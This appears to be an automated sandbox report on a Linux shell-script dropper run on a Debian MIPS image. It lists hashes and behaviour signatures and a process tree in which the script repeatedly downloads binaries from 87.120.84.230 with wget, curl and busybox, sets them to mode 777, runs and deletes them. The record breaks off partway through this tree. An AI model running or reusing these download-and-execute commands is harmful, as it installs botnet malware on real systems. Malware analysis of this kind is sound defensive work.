Analysis
-
max time kernel
73s -
max time network
75s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
-
Size
10KB
-
MD5
a16f2f2454e5b18f780fd0e5f5db5230
-
SHA1
f8c9a2379edf5ce246d41383617f895ef5840d7c
-
SHA256
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3
-
SHA512
79ee2c5eb57fb5281133280b36b26033038ef2ee4641bba5561500c47537cc2b656a2e7810a2879954bb95b143811d44dd0c01eee312b69c3267042254d35f92
-
SSDEEP
192:lVkP23rABx8p/2aJMkxUAQtiZEYq3rABxu2aJMkxkAQtiZEL:lVkP23rABx8p/2aJMkxbBq3rABxu2aJW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 941 chmod 959 chmod 971 chmod 731 chmod 786 chmod 935 chmod 881 chmod 737 chmod 917 chmod 929 chmod 953 chmod 800 chmod 851 chmod 899 chmod 887 chmod 911 chmod 947 chmod 965 chmod 824 chmod 857 chmod 893 chmod 905 chmod 743 chmod 806 chmod 923 chmod 863 chmod 875 chmod 869 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 732 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 738 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 744 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 788 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 801 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 807 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 826 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 852 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 858 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 864 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 870 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 876 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 882 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 888 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 894 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 900 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 906 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 912 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 918 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 924 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 930 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 936 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 942 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 948 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 954 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 960 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 966 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 972 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl
Processes
-
/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:729
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:736
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:739
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:740
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:742
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:778
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:799
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:805
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:819
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:849
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:856
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:862
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:868
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:874
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:880
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:886
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:892
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:898
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:904
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:910
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:916
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:922
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:928
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:930
-
-
